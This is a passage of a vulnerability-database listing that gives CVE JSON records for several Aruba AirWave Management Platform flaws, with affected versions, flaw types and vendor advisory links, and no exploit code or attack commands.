Severity ?
Summary
A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:40:46.913Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authenticated arbitrary command execution",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T16:43:48",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26971",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authenticated arbitrary command execution vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Vulnerabilities in the AirWave web-base management interface could allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authenticated arbitrary command execution"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26971",
    "datePublished": "2021-03-05T16:43:48",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:40:46.913Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2015-2202
Vulnerability from cvelistv5
Published
2023-09-05 00:00
Modified
2024-09-30 17:42
Severity ?
Summary
Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows administrative users to escalate privileges to root on the underlying OS.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T05:10:16.168Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2015-2202",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-30T17:41:55.243312Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-30T17:42:08.230Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Aruba AirWave before 7.7.14.2 and 8.x before 8.0.7 allows administrative users to escalate privileges to root on the underlying OS."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-05T17:44:14.043673",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-005.txt"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-2202",
    "datePublished": "2023-09-05T00:00:00",
    "dateReserved": "2015-03-03T00:00:00",
    "dateUpdated": "2024-09-30T17:42:08.230Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-26960
Vulnerability from cvelistv5
Published
2021-03-05 15:57
Modified
2024-08-03 20:33
Severity ?
Summary
A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T20:33:41.313Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote unauthenticated cross-site request forgery (csrf)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-03-05T15:57:56",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-26960",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote unauthenticated cross-site request forgery (csrf) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. A vulnerability in the AirWave web-based management interface could allow an unauthenticated remote attacker to conduct a CSRF attack against a vulnerable system. A successful exploit would consist of an attacker persuading an authorized user to follow a malicious link, resulting in arbitrary actions being carried out with the privilege level of the targeted user."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote unauthenticated cross-site request forgery (csrf)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-005.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-26960",
    "datePublished": "2021-03-05T15:57:56",
    "dateReserved": "2021-02-09T00:00:00",
    "dateUpdated": "2024-08-03T20:33:41.313Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25151
Vulnerability from cvelistv5
Published
2021-04-28 18:18
Modified
2024-08-03 19:56
Severity ?
Summary
A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.643Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote insecure deserialization",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T18:18:26",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25151",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote insecure deserialization vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote insecure deserialization"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25151",
    "datePublished": "2021-04-28T18:18:26",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.643Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25164
Vulnerability from cvelistv5
Published
2021-04-28 19:37
Modified
2024-08-03 19:56
Severity ?
Summary
A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.650Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote xml external entity",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T19:37:22",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25164",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote XML external entity vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote xml external entity"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25164",
    "datePublished": "2021-04-28T19:37:22",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.650Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25167
Vulnerability from cvelistv5
Published
2021-04-29 11:00
Modified
2024-08-03 19:56
Severity ?
Summary
A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.638Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote unauthorized access",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-29T11:00:28",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25167",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote unauthorized access vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote unauthorized access"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25167",
    "datePublished": "2021-04-29T11:00:28",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.638Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-25147
Vulnerability from cvelistv5
Published
2021-04-28 14:15
Modified
2024-08-03 19:56
Severity ?
Summary
A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.12.1
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T19:56:10.581Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.12.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote authentication restriction bypass",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-04-28T14:15:27",
        "orgId": "eb103674-0d28-4225-80f8-39fb86215de0",
        "shortName": "hpe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-alert@hpe.com",
          "ID": "CVE-2021-25147",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Aruba AirWave Management Platform",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Prior to 8.2.12.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A remote authentication restriction bypass vulnerability was discovered in Aruba AirWave Management Platform version(s) prior to 8.2.12.1. Aruba has released patches for AirWave Management Platform that address this security vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "remote authentication restriction bypass"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt",
              "refsource": "MISC",
              "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-010.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "eb103674-0d28-4225-80f8-39fb86215de0",
    "assignerShortName": "hpe",
    "cveId": "CVE-2021-25147",
    "datePublished": "2021-04-28T14:15:27",
    "dateReserved": "2021-01-14T00:00:00",
    "dateUpdated": "2024-08-03T19:56:10.581Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-2032
Vulnerability from cvelistv5
Published
2020-01-31 19:53
Modified
2024-08-05 23:17
Severity ?
Summary
A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:17:49.407Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2016/May/19"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.google.com/about/appsecurity/research/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-05-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-31T19:53:50",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2016/May/19"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.google.com/about/appsecurity/research/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2032",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672"
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/136997/Aruba-Authentication-Bypass-Insecure-Transport-Tons-Of-Issues.html"
            },
            {
              "name": "http://seclists.org/fulldisclosure/2016/May/19",
              "refsource": "MISC",
              "url": "http://seclists.org/fulldisclosure/2016/May/19"
            },
            {
              "name": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt",
              "refsource": "MISC",
              "url": "http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2016-005.txt"
            },
            {
              "name": "https://www.google.com/about/appsecurity/research/",
              "refsource": "MISC",
              "url": "https://www.google.com/about/appsecurity/research/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2032",
    "datePublished": "2020-01-31T19:53:50",
    "dateReserved": "2016-01-22T00:00:00",
    "dateUpdated": "2024-08-05T23:17:49.407Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2021-37715
Vulnerability from cvelistv5
Published
2021-08-26 19:40
Modified
2024-08-04 01:23
Severity ?
Summary
A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability.
Impacted products
Vendor Product Version
n/a Aruba AirWave Management Platform Version: Prior to 8.2.13.0
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T01:23:01.561Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-015.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Aruba AirWave Management Platform",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Prior to 8.2.13.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A remote cross-site scripting (XSS) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.13.0. Aruba has released upgrades for the Aruba AirWave Management Platform that address this security vulnerability."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "remote cross-site scripting (xss)",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
